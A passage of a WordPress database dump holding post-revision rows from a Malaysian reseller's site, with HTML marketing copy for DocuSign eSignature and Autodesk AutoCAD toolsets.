sizes=\"(max-width: 438px) 100vw, 438px\" />											\n										<img width=\"392\" height=\"184\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png 392w, https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07-300x141.png 300w\" sizes=\"(max-width: 392px) 100vw, 392px\" />											\n		<p><strong>Works with the applications, services and devices your business already uses</strong><br />DocuSign fits right into your existing systems so youâ€™ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.</p><p><strong>The reliable, globally-trusted service for electronic signatures</strong><br />Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p>		\n										<img width=\"460\" height=\"144\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png 460w, https://bintara.com.my/wp-content/uploads/2019/01/SMB-300x94.png 300w\" sizes=\"(max-width: 460px) 100vw, 460px\" />											\n		<h3>Delight your customers, partners, and employees with a better way of doing business</h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. Itâ€™s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.</p><h3>Your company\'s digital future is here</h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.		\n			<a href=\"#\" role=\"button\">\n						Contact Us\n					</a>\n		<h2>DocuSign</h2><h3>Grow your business.<br />Shrink your paperwork.</h3><h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><h3><img src=\"https://www.docusign.com/sites/default/files/keybenefits-1.png\" alt=\"DocuSign signing experience in mobile device\" width=\"438\" height=\"212\" data-delta=\"1\" /></h3><h3>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</h3><p>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,Â collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p><h3><img src=\"https://www.docusign.com/sites/default/files/smb-keybenefits-2-2_07.png\" alt=\"\" width=\"392\" height=\"184\" data-delta=\"1\" /></h3><h3>Works with the applications, services and devices your business already uses</h3><p>DocuSign fits right into your existing systems so youâ€™ll be productive, instantly.Â Use DocuSign with over 300 popular servicesÂ like Google, Salesforce and Box, orÂ access our award-winning appÂ from practically any mobile device. Works with virtually any kind of document.</p><h3><img src=\"https://www.docusign.com/sites/default/files/SMB.png\" alt=\"\" width=\"460\" height=\"144\" data-delta=\"3\" /></h3><h3>The reliable, globally-trusted service for electronic signatures</h3><p>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p><h2>Â </h2><h3>Do more with the #1 eSignature platform for business</h3><ul><li>Simple and fast setup gets you started immediately</li><li>99.99% platform availability keeps your business running at all hours</li><li>Flexible workflows to automate any agreement or approval process</li><li>Rigorous security standards keep sensitive documents safe</li><li>Instant visibility into document status and powerful reporting</li><li>Full digital audit trail for easy compliance and legal enforceability</li></ul><p>[maxbutton id=\"1\" ]</p>Â Â ','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2019-01-04 10:12:50','2019-01-04 02:12:50','',1481,'https://bintara.com.my/blog/2019/01/04/1481-revision-v1/',0,'revision','',0),(3206,1,'2019-09-18 16:23:42','2019-09-18 08:23:42','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h1>\r\n</div>\r\n<div class=\"text section\">\r\n\r\nAutodesk, Inc., is a leader in 3D design, engineering and entertainment software. Since its introduction of AutoCAD software in 1982, Autodesk continues to develop the broadest portfolio of Build &amp; Design software for global markets.\r\n\r\nCustomers across the manufacturing, architecture, building, construction, media and entertainment industries â€” including the last 21 Academy Award winners for Best Visual Effects â€” use Autodesk software to design, visualize, and simulate their ideas before they\'re ever built or created. From blockbuster visual effects and buildings that create their own energy, to electric cars and the batteries that power them, the work of our 30 software customers is everywhere you look.\r\n\r\n&nbsp;\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"500\" height=\"55\" /></div>\r\n<div class=\"heading section\">\r\n<h3 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">What\'s included</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2019-09-18 16:23:42','2019-09-18 08:23:42','',1444,'https://bintara.com.my/blog/2019/09/18/1444-revision-v1/',0,'revision','',0),(2798,1,'2019-01-04 10:25:53','2019-01-04 02:25:53','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h2 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h2>\r\n</div>\r\n<div class=\"text section\">\r\n\r\nAutodesk, Inc., is a leader in 3D design, engineering and entertainment software. Since its introduction of AutoCAD software in 1982, Autodesk continues to develop the broadest portfolio of Build &amp; Design software for global markets.\r\n\r\nCustomers across the manufacturing, architecture, building, construction, media and entertainment industries â€” including the last 21 Academy Award winners for Best Visual Effects â€” use Autodesk software to design, visualize, and simulate their ideas before they\'re ever built or created. From blockbuster visual effects and buildings that create their own energy, to electric cars and the batteries that power them, the work of our 30 software customers is everywhere you look.\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"500\" height=\"55\" /></div>\r\n<div class=\"heading section\">\r\n<h3 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">What\'s included</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" 